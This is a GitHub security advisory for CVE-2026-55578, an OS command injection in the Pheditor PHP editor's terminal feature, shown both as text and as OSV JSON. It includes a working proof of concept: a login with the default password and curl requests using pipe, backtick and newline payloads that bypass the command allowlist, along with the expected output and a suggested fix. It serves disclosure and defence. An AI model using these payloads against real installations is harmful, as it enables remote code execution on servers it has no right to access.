GHSA-WG4W-WR5Q-6VJC
Vulnerability from github – Published: 2026-07-16 20:10 – Updated: 2026-07-16 20:10Summary
The terminal feature in Pheditor uses an incomplete character blocklist to sanitize user-supplied commands before passing them to shell_exec(). After the fix for GHSA-9643-6xjp-vx57 (which added $ to the blocklist), the characters | (single pipe), ` (backtick), and the newline byte (0x0A) remain unblocked. An authenticated user with the terminal permission (enabled by default) can leverage any of these to bypass the TERMINAL_COMMANDS allowlist and execute arbitrary OS commands as the web server user.
Details
Tested repository: https://github.com/pheditor/pheditor
Tested commit: e538f05b6faec99e5b23726bc9c17d6b57774297 (current HEAD on main)
Affected version: Pheditor 2.0.1+
The terminal handler receives $_POST['command'] and passes it to shell_exec() at pheditor.php:586:
$output = shell_exec((empty($dir) ? null : 'cd ' . escapeshellarg($dir) . ' && ') . $command . ' && echo \ ; pwd');
The blocklist at pheditor.php:557 checks for &, ;, ||, and $, but does not block |, `, or newline (0x0A):
if (strpos($command, '&') !== false || strpos($command, ';') !== false || strpos($command, '||') !== false || strpos($command, '$') !== false) {
echo json_error("Illegal character(s) in command (& ; ||)\n");
exit;
}
The TERMINAL_COMMANDS prefix check at pheditor.php:566-573 only validates that the command starts with an allowed name. All three bypasses start with a whitelisted command prefix.
Bypass 1 — Single pipe |:
The filter checks for || but not single |. Payload ls | id passes both the blocklist and the whitelist (starts with ls). The shell executes: cd '<dir>' && ls | id && echo \ ; pwd, running id.
Bypass 2 — Backtick `:
Backtick is not in the blocklist. Payload echo `id` passes the blocklist and whitelist (starts with echo). The shell executes id inside backtick substitution.
Bypass 3 — Newline 0x0A:
A literal newline byte is not in the blocklist. Payload ls\ntouch /tmp/proof (where \n is 0x0A) passes both checks. Only the first line is validated against the whitelist. The second line runs as an independent command.
PoC
Environment: Any system running PHP 8.x with pheditor.php deployed and shell_exec() enabled.
Setup:
git clone https://github.com/pheditor/pheditor /tmp/pheditor-test
cd /tmp/pheditor-test
php -S localhost:8080 pheditor.php &
Authenticate (default password admin):
curl -s -c /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php -d "pheditor_password=admin" -L > /dev/null
TOKEN=$(curl -s -b /tmp/cookies.txt http://localhost:8080/pheditor.php | grep -o 'token = "[a-f0-9]*"' | grep -o '"[a-f0-9]*"' | tr -d '"')
Bypass 1 (pipe |):
curl -s -b /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php \
--data-urlencode "action=terminal" \
--data-urlencode "token=$TOKEN" \
--data-urlencode "command=ls | id" \
--data-urlencode "dir="
Expected: {"error":false,"message":"OK","result":"uid=... gid=...\n",...} — id output proves RCE.
Bypass 2 (backtick):
curl -s -b /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php \
--data-urlencode "action=terminal" \
--data-urlencode "token=$TOKEN" \
--data-urlencode 'command=echo `id`' \
--data-urlencode "dir="
Expected: Same id output in response.
Bypass 3 (newline 0x0A):
curl -s -b /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php \
--data-urlencode "action=terminal" \
--data-urlencode "token=$TOKEN" \
--data-urlencode $'command=ls\nid' \
--data-urlencode "dir="
Expected: Same id output in response.
Control (blocked command without bypass):
curl -s -b /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php \
--data-urlencode "action=terminal" \
--data-urlencode "token=$TOKEN" \
--data-urlencode "command=whoami" \
--data-urlencode "dir="
Expected: {"error":true,"message":"Command not allowed..."} — allowlist enforced.
Cleanup:
kill %1; rm -rf /tmp/pheditor-test /tmp/cookies.txt
Impact
OS Command Injection (CWE-78). Any authenticated Pheditor user with the terminal permission (enabled by default) can bypass the TERMINAL_COMMANDS allowlist and execute arbitrary OS commands as the web server user. This is a bypass of the partial fix for GHSA-9643-6xjp-vx57 — that fix addressed $() substitution but three additional shell metacharacters remain unblocked.
Attacker privileges: Authenticated user (PR:L). Combined with default password admin, effectively PR:N.
Impact: Full read/write/execute access as the web server user. Confidentiality: High (read any accessible file). Integrity: High (write/delete files, deploy webshells). Availability: High (disrupt services).
Suggested remediation: Parse the command into executable + arguments, validate the executable against TERMINAL_COMMANDS with exact match, pass each argument through escapeshellarg(), or use proc_open() with an argument array to avoid shell interpretation entirely.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "pheditor/pheditor"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.1"
},
{
"fixed": "2.0.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-55578"
],
"database_specific": {
"cwe_ids": [
"CWE-78"
],
"github_reviewed": true,
"github_reviewed_at": "2026-07-16T20:10:47Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\n\nThe terminal feature in Pheditor uses an incomplete character blocklist to sanitize user-supplied commands before passing them to `shell_exec()`. After the fix for GHSA-9643-6xjp-vx57 (which added `$` to the blocklist), the characters `|` (single pipe), `` ` `` (backtick), and the newline byte (`0x0A`) remain unblocked. An authenticated user with the `terminal` permission (enabled by default) can leverage any of these to bypass the `TERMINAL_COMMANDS` allowlist and execute arbitrary OS commands as the web server user.\n\n### Details\n\nTested repository: https://github.com/pheditor/pheditor\n\nTested commit: `e538f05b6faec99e5b23726bc9c17d6b57774297` (current HEAD on `main`)\n\nAffected version: Pheditor 2.0.1+\n\nThe terminal handler receives `$_POST[\u0027command\u0027]` and passes it to `shell_exec()` at `pheditor.php:586`:\n\n```php\n$output = shell_exec((empty($dir) ? null : \u0027cd \u0027 . escapeshellarg($dir) . \u0027 \u0026\u0026 \u0027) . $command . \u0027 \u0026\u0026 echo \\ ; pwd\u0027);\n```\n\nThe blocklist at `pheditor.php:557` checks for `\u0026`, `;`, `||`, and `$`, but does not block `|`, `` ` ``, or newline (`0x0A`):\n\n```php\nif (strpos($command, \u0027\u0026\u0027) !== false || strpos($command, \u0027;\u0027) !== false || strpos($command, \u0027||\u0027) !== false || strpos($command, \u0027$\u0027) !== false) {\n echo json_error(\"Illegal character(s) in command (\u0026 ; ||)\\n\");\n exit;\n}\n```\n\nThe `TERMINAL_COMMANDS` prefix check at `pheditor.php:566-573` only validates that the command starts with an allowed name. All three bypasses start with a whitelisted command prefix.\n\n**Bypass 1 \u2014 Single pipe `|`:**\nThe filter checks for `||` but not single `|`. Payload `ls | id` passes both the blocklist and the whitelist (starts with `ls`). The shell executes: `cd \u0027\u003cdir\u003e\u0027 \u0026\u0026 ls | id \u0026\u0026 echo \\ ; pwd`, running `id`.\n\n**Bypass 2 \u2014 Backtick `` ` ``:**\nBacktick is not in the blocklist. Payload `` echo `id` `` passes the blocklist and whitelist (starts with `echo`). The shell executes `id` inside backtick substitution.\n\n**Bypass 3 \u2014 Newline `0x0A`:**\nA literal newline byte is not in the blocklist. Payload `ls\\ntouch /tmp/proof` (where `\\n` is 0x0A) passes both checks. Only the first line is validated against the whitelist. The second line runs as an independent command.\n\n### PoC\n\n**Environment:** Any system running PHP 8.x with pheditor.php deployed and `shell_exec()` enabled.\n\n**Setup:**\n```bash\ngit clone https://github.com/pheditor/pheditor /tmp/pheditor-test\ncd /tmp/pheditor-test\nphp -S localhost:8080 pheditor.php \u0026\n```\n\n**Authenticate** (default password `admin`):\n```bash\ncurl -s -c /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php -d \"pheditor_password=admin\" -L \u003e /dev/null\nTOKEN=$(curl -s -b /tmp/cookies.txt http://localhost:8080/pheditor.php | grep -o \u0027token = \"[a-f0-9]*\"\u0027 | grep -o \u0027\"[a-f0-9]*\"\u0027 | tr -d \u0027\"\u0027)\n```\n\n**Bypass 1 (pipe `|`):**\n```bash\ncurl -s -b /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php \\\n --data-urlencode \"action=terminal\" \\\n --data-urlencode \"token=$TOKEN\" \\\n --data-urlencode \"command=ls | id\" \\\n --data-urlencode \"dir=\"\n```\nExpected: `{\"error\":false,\"message\":\"OK\",\"result\":\"uid=... gid=...\\n\",...}` \u2014 `id` output proves RCE.\n\n**Bypass 2 (backtick):**\n```bash\ncurl -s -b /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php \\\n --data-urlencode \"action=terminal\" \\\n --data-urlencode \"token=$TOKEN\" \\\n --data-urlencode \u0027command=echo `id`\u0027 \\\n --data-urlencode \"dir=\"\n```\nExpected: Same `id` output in response.\n\n**Bypass 3 (newline 0x0A):**\n```bash\ncurl -s -b /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php \\\n --data-urlencode \"action=terminal\" \\\n --data-urlencode \"token=$TOKEN\" \\\n --data-urlencode $\u0027command=ls\\nid\u0027 \\\n --data-urlencode \"dir=\"\n```\nExpected: Same `id` output in response.\n\n**Control (blocked command without bypass):**\n```bash\ncurl -s -b /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php \\\n --data-urlencode \"action=terminal\" \\\n --data-urlencode \"token=$TOKEN\" \\\n --data-urlencode \"command=whoami\" \\\n --data-urlencode \"dir=\"\n```\nExpected: `{\"error\":true,\"message\":\"Command not allowed...\"}` \u2014 allowlist enforced.\n\n**Cleanup:**\n```bash\nkill %1; rm -rf /tmp/pheditor-test /tmp/cookies.txt\n```\n\n### Impact\n\nOS Command Injection (CWE-78). Any authenticated Pheditor user with the `terminal` permission (enabled by default) can bypass the `TERMINAL_COMMANDS` allowlist and execute arbitrary OS commands as the web server user. This is a bypass of the partial fix for GHSA-9643-6xjp-vx57 \u2014 that fix addressed `$()` substitution but three additional shell metacharacters remain unblocked.\n\n**Attacker privileges:** Authenticated user (PR:L). Combined with default password `admin`, effectively PR:N.\n\n**Impact:** Full read/write/execute access as the web server user. Confidentiality: High (read any accessible file). Integrity: High (write/delete files, deploy webshells). Availability: High (disrupt services).\n\n**Suggested remediation:** Parse the command into executable + arguments, validate the executable against `TERMINAL_COMMANDS` with exact match, pass each argument through `escapeshellarg()`, or use `proc_open()` with an argument array to avoid shell interpretation entirely.",
"id": "GHSA-wg4w-wr5q-6vjc",
"modified": "2026-07-16T20:10:47Z",
"published": "2026-07-16T20:10:47Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pheditor/pheditor/security/advisories/GHSA-wg4w-wr5q-6vjc"
},
{
"type": "PACKAGE",
"url": "https://github.com/pheditor/pheditor"
},
{
"type": "WEB",
"url": "https://github.com/pheditor/pheditor/releases/tag/2.0.6"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Pheditor: Incomplete command sanitization in terminal feature allows RCE via pipe operator, backtick substitution, and newline injection"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.